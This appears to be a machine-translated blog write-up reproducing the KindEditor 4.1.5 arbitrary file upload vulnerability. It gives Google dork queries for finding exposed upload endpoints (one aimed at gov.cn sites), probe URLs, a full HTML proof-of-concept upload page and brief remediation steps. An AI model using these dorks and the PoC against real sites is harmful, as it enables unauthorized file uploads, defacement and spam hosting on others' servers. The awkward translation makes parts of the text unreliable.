éditeur kindeditor <= 4.1.5 télécharger la reproduction de la vulnérabilité

Stade précoce

Recherche grammaticale Google

inurl:/examples/uploadbutton.html

inurl:/php/upload_json.php

inurl:/asp.net/upload_json.ashx

inurl://jsp/upload_json.jsp

inurl://asp/upload_json.asp

inurl:gov.cn/kindeditor/

Tout d'abord, nous devons regarder le langage de script et prescrire le bon médicament

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

Vérifiez s'il existe cette vulnérabilité de téléchargement de script

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

récurrent

1. Afficher les informations de version

http://www.xxx.org/kindeditor//kindeditor.js

Insérez la description de l'image ici
2. Vérifiez si le chemin existe

http://xxxxxxxxxxxxx/kindeditor/php/upload_json.php?dir=file

Insérez la description de l'image ici
Le poc donné par le grand gars, doit être modifié ici

<html><head>
<title>Uploader</title>
<script src="http://xxxxxxxxxxxxxxx/kindeditor/kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
    
    
var uploadbutton = K.uploadbutton({
    
    
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://xxxxxxxxxxxxxxx/kindeditor/php/upload_json.php?dir=file',
afterUpload : function(data) {
    
    
if (data.error === 0) {
    
    
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
    
    
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>

Enregistrez-le au format 1.html
Insérez la description de l'image ici
et utilisez burp pour capturer le paquet et consulter l'adresse renvoyée.
Insérez la description de l'image ici
Insérez la description de l'image ici
Vous pouvez également télécharger le fichier .html, voici le fichier de téléchargement préféré de l'attaquant (qui contient diverses adresses de lien de page sombre, telles que les épinards et autres adresses de sites pornographiques)

réparation

1. Supprimez directement upload_json. Et file_manager_json.
2. Mettez à niveau kindeditor vers la dernière version

Je suppose que tu aimes

Origine blog.csdn.net/p_utao/article/details/111051813
conseillé
Classement